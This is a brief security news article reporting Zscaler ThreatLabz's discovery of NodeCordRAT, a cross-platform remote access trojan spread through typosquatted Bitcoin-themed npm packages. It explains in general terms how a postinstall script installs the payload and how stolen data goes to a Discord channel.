The Team has recently discovered an undocumented malware hidden in three malicious npm packages called NodeCordRAT. NodeCordRAT Zscaler ThreatLabz researchers Satyam Singh and Lakhan Parashar discovered a new RAT called NodeCordRAT. This Remote Access Trojan (RAT) was tailor-made to infect users in the npm ecosystem.
The packages, posted by the user “wenmoonx,” were removed in November of 2025. They added bitcoin-main-lib, bitcoin-lib-js and bip40, which had been intentionally named to resemble official repositories located inside of the bitcoinjs project. These harmful packages had already attracted a ton of traffic, with bitcoin-main-lib having 2,300 downloads, bitcoin-lib-js 193 downloads, and bip40 970 downloads.
Delivery Mechanism and Functionality
NodeCordRAT takes advantage of a post-installation script when installing the bitcoin-main-lib and bitcoin-lib-js packages. This script is used to install the bip40 package, which is where the malicious payload was hidden.
“The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the malicious payload,” – Satyam Singh and Lakhan Parashar
After installation, NodeCordRAT establishes a hidden communication channel with a hard-coded Discord server. This allows this upgraded malware to take instructions with input from remote operators and run in a stealthy, less detectable manner. By using Discord’s API with a hardcoded token, NodeCordRAT can exfiltrate data into a private channel.
“This data is exfiltrated using Discord’s API with a hardcoded token and sent to a private channel,” – Zscaler
Targeted Platforms and Unique Identification
NodeCordRAT’s versatility shines through in its flexibility as it runs stealthily across Windows, Linux, and macOS environments. The malware fingerprints the infected host to ensure a unique identifier can be generated. This feature provides a remote operator the means to monitor and command compromised hosts efficiently.
By deciding to deliver the attack through npm packages, this demonstrates a more targeted approach. This change will most directly harm developers who often rely on these repositories to access software components. By disguising themselves as widely accepted and respected development tools in the Bitcoin community, NodeCordRAT was able to gain entry to systems much more easily.